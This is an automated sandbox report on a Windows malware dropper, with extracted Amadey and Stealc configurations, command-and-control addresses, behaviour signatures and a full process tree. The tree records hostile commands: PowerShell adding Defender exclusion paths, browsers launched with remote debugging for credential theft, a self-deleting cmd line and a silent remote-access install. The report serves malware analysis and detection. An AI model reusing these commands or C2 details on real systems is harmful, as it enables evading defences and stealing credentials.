Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-12-2024 15:11

General

  • Target

    d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe

  • Size

    2.8MB

  • MD5

    24b901146bc0e8b0dd5a232218153c82

  • SHA1

    ae0b756a87ad4482d474653cb47c1a92adeb84d2

  • SHA256

    d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a

  • SHA512

    dcae00cd24bc17825b32a39a737dbda90f0bea019bc356865eec1fb831c8be7cb114bf6913de4c3d17c42f4fcec7e5b4a1bad65a202de41680e58bf4d12e99f4

  • SSDEEP

    49152:cBlY2cKSZQlaMrf44mrNVaQ/n+hCAyQ7R2cKnnVqO:WlY2JSZQlaMrA4CfaQ/+mb

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

cryptbot

Extracted

Family

lumma

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Cryptbot family
  • Detect Vidar Stealer 3 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 19 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 24 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Drops file in Program Files directory 19 IoCs
  • Drops file in Windows directory 15 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2860
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:540
    • C:\Users\Admin\AppData\Local\Temp\d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe
      "C:\Users\Admin\AppData\Local\Temp\d8ab74b2a9450c2ca9d269ce168e0b55722852e612b04fc162421497bbcd1e4a.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
        "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:5064
        • C:\Users\Admin\AppData\Local\Temp\1007452001\8cc80292dc.exe
          "C:\Users\Admin\AppData\Local\Temp\1007452001\8cc80292dc.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
            4⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2664
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xdc,0x104,0x7ffabf3acc40,0x7ffabf3acc4c,0x7ffabf3acc58
              5⤵
                PID:2440
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1932 /prefetch:2
                5⤵
                  PID:224
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3
                  5⤵
                    PID:2232
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1236,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2480 /prefetch:8
                    5⤵
                      PID:3180
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:3620
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3244 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:2292
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4200 /prefetch:1
                      5⤵
                      • Uses browser remote debugging
                      PID:2824
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4644,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8
                      5⤵
                        PID:2336
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4932,i,16201929604975300753,5858040483876760475,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4944 /prefetch:8
                        5⤵
                          PID:3564
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                        4⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                        • Suspicious use of FindShellTrayWindow
                        PID:4072
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffabf3b46f8,0x7ffabf3b4708,0x7ffabf3b4718
                          5⤵
                          • Checks processor information in registry
                          • Enumerates system info in registry
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4308
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                          5⤵
                            PID:4892
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
                            5⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:464
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
                            5⤵
                              PID:1956
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:2436
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:2696
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:1000
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2140,4026442857944222317,7250124987075483766,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:4804
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\GIEHJKEBAA.exe"
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:3408
                            • C:\Users\Admin\Documents\GIEHJKEBAA.exe
                              "C:\Users\Admin\Documents\GIEHJKEBAA.exe"
                              5⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:2956
                        • C:\Users\Admin\AppData\Local\Temp\1007453001\0141c128fe.exe
                          "C:\Users\Admin\AppData\Local\Temp\1007453001\0141c128fe.exe"
                          3⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4888
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 536
                            4⤵
                            • Program crash
                            PID:3600
                        • C:\Users\Admin\AppData\Local\Temp\1007454001\d24b29e6ff.exe
                          "C:\Users\Admin\AppData\Local\Temp\1007454001\d24b29e6ff.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Drops file in Windows directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          PID:3424
                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1968
                            • C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe
                              "C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"
                              5⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1208
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Add-MpPreference -ExclusionPath "C:\obtkau"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1108
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2720
                              • C:\obtkau\1cdb19d023cb47dda162b07004e8219c.exe
                                "C:\obtkau\1cdb19d023cb47dda162b07004e8219c.exe"
                                6⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Checks processor information in registry
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2704
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\obtkau\1cdb19d023cb47dda162b07004e8219c.exe" & rd /s /q "C:\ProgramData\D2NGDJWL6P8Q" & exit
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2076
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /t 10
                                    8⤵
                                    • System Location Discovery: System Language Discovery
                                    • Delays execution with timeout.exe
                                    PID:4756
                              • C:\obtkau\d8bcf0ab5b9a434fbb9deced6cbc77f9.exe
                                "C:\obtkau\d8bcf0ab5b9a434fbb9deced6cbc77f9.exe"
                                6⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3664
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi
                                  7⤵
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:5096
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab97c46f8,0x7ffab97c4708,0x7ffab97c4718
                                    8⤵
                                      PID:1864
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2300 /prefetch:2
                                      8⤵
                                        PID:4636
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
                                        8⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1464
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8
                                        8⤵
                                          PID:868
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                          8⤵
                                            PID:4136
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                            8⤵
                                              PID:2336
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
                                              8⤵
                                                PID:2816
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
                                                8⤵
                                                  PID:1536
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
                                                  8⤵
                                                    PID:3436
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
                                                    8⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:640
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                    8⤵
                                                      PID:1572
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2292,6688589764653632519,11268766668443645199,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
                                                      8⤵
                                                        PID:4308
                                                • C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"
                                                  5⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:408
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"
                                                    6⤵
                                                    • Enumerates connected drives
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5396
                                                • C:\Users\Admin\AppData\Local\Temp\1017682001\88b8dcd228.exe
